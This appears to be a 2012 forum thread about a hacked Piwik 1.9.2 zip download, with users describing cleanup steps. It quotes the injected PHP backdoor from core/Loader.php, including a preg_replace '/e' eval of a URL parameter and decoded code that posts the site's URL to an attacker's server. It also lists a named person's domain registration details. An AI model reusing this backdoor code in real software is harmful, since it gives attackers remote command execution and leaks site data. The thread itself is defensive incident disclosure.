Please be aware of the newest

Thie file core/Loader.php is infected!!


The setup returns a warning about its size.


but what should we do ?

IMO: Don`t install it until a new, safe release is out.

What if we have installed it?
Does it create anything we need to be worried about/remove?

At least delete the code which is evaled.
It seems the code opens a backdoor which allows the offender to run all allowed functions over eval().

If you already installed:

  1. Remove “piwik/core/DataTable/Filter/Megre.php”. This is a general purpose uploading form and shell !!! EDIT: It’s also a shell command launcher…

  2. Remove the last 6 lines from “piwik/core/Loader.php”:

<?php Error_Reporting(0); 	if(isset($_GET['g']) && isset($_GET['s'])) {
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
  if (file_exists(dirname(__FILE__)."/lic.log")) exit;

Which once decoded execute the following code:

$_1="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070725 Firefox/";
$_2=str_replace("&","%26",$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']);
if(file_exists(direname(__FILE__) ."/lic.log"))exit;
function l__0($_4,$_1,$_5,$_6)
	curl_setopt($_7,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070725 Firefox/");
	curl_setopt($_7,CURLOPT_POSTFIELDS,"reff=" .$_6);
	return $_8;

function l__1($_9,$_10,$_11=l__2)
	$_12=array("http"=> array("method"=> "POST","content"=> $_10));
	if($_11 !== l__2)
		return false;
	if($_15 === false)
		return false;
	return $_15;

$_16=l__1("","reff=".str_replace("&","%26",$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']));

if($_16 == false)
	$_16=l__0("","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070725 Firefox/",5,str_replace("&","%26",$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']));
$_17=fopen((direname(__FILE__) ."/lic.log"),"a+");
fwrite($_17,"piwik" ."\n");

This simply send to the hacker the url of the uploading form…

In fact it’s even worst than that, the following code:

preg_replace("/(.+)/e", $_GET['g'], 'dwm');

execute the command given in the g parameter of the url

  1. Try to figure out if any other files have been uploaded with the form (might be hard this error reporting seems to have been turned of)

If you want to reinstall go here: the piwik-1.9.2.tar.gz is not infected (when I’m writting, might get infected later :/) check the date field, it should be from 09-Nov-2012 08:25. /!\ the .zip version is the infected one !!! EDIT: It is probably safer to download it from piwik’s github account: Tags · matomo-org/matomo · GitHub

If you want to thanks that guy, the domain name where your piwik url is send is registred by this guy:

Name: Amanda D. Clarke
Organization: Amanda D. Clarke
Address: 1142 Southern Street
City: Glen Cove
Province/state: NY
Country: US
Postal Code: 11542

(but it might be fake, I don’t know the .com registration verification procedure) should be ok again. We are still checking the reason for that issue and how that “hacker” had the chance to manipulate the file on the server. Sorry for the inconvenience.

plz setup you’re ids and ban asap any adresses trying to reach these file.

Check your file asap².


we just updated our piwik installations on november 22nd through automatic web-update and were not affected by this problem.

Did you find HOW the malicious code have been injected in this file ?

Automatic upgrade installation from 9th November is also clean on my piwik system.

Guess we did, but we are still checking the servers. I think we will publish a statement later.

Btw. The infected file was only “available” yesterday for a couple of hours. All updates done before and after that should not be affected.

A friend of mine upgraded the 14th, nothing in sources too .

Mine autoupdated seems to be clean as well. Can you say when this code came into the repos?

Download Piwik 1.9.2: 18.11.2012
Code: clean

The infected code was never in the repository. The infected zip file was placed directly on the server

Is there a way to determine the exact day and time when the download and installation was done?

Was the webupdate affected too? Or just the manual download? (Maybe it’s the same file)

My installation is also clean, updated to 1.9.2 at Nov 10, 08:00 h CET

Here is the official statement: Security Report: webserver hacked for a few hours on 2012 Nov 26th - Analytics Platform - Matomo